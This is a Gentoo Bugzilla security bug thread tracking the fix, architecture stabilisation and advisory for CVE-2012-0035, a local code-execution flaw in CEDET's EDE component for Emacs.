Summary: | <app-emacs/cedet-1.0.1 : security flaw in EDE, local execution of arbitrary code (CVE-2012-0035) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Ulrich Müller <ulm> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | normal | CC: | emacs |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | http://lists.gnu.org/archive/html/emacs-devel/2012-01/msg00387.html | ||
Whiteboard: | B2 [glsa] | ||
Package list: | Runtime testing required: | --- |
Description
Ulrich Müller
2012-01-09 09:35:03 UTC
An updated patchball for Emacs is on its way to Gentoo mirrors; I'll commit the ebuild later today. (In reply to comment #0) > Adding xemacs team to CC for app-xemacs/cedet-common. Sorry, this was wrong. The package (potentially) affected is app-xemacs/ede. app-editors/emacs and app-xemacs/ede issues split off to bug 398239 and bug 398241 (after being told in #gentoo-security to do so). Fixed in app-emacs/cedet-1.0-r1. CCing arch teams, please stabilise. amd64 stable cedet-1.0.1 has been released upstream, with the security fix included. Please stabilise this version instead. (In reply to comment #4) > cedet-1.0.1 has been released upstream, with the security fix included. > Please stabilise this version instead. Ok, thanks. Readded amd64 (sorry, guys). Arches, please test and mark stable: =app-emacs/cedet-1.0.1 Target keywords : "amd64 ppc sparc x86" amd64 ok amd64 stable, thanks Michael x86 stable sparc keywords dropped ppc done; closing as last arch filed new glsa request. Vulnerable version cedet-1.0 removed. CVE-2012-0035 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0035): Untrusted search path vulnerability in EDE in CEDET before 1.0.1, as used in GNU Emacs before 23.4 and other products, allows local users to gain privileges via a crafted Lisp expression in a Project.ede file in the directory, or a parent directory, of an opened file. This issue was resolved and addressed in GLSA 201401-31 at http://security.gentoo.org/glsa/glsa-201401-31.xml by GLSA coordinator Mikle Kolyada (Zlogene). |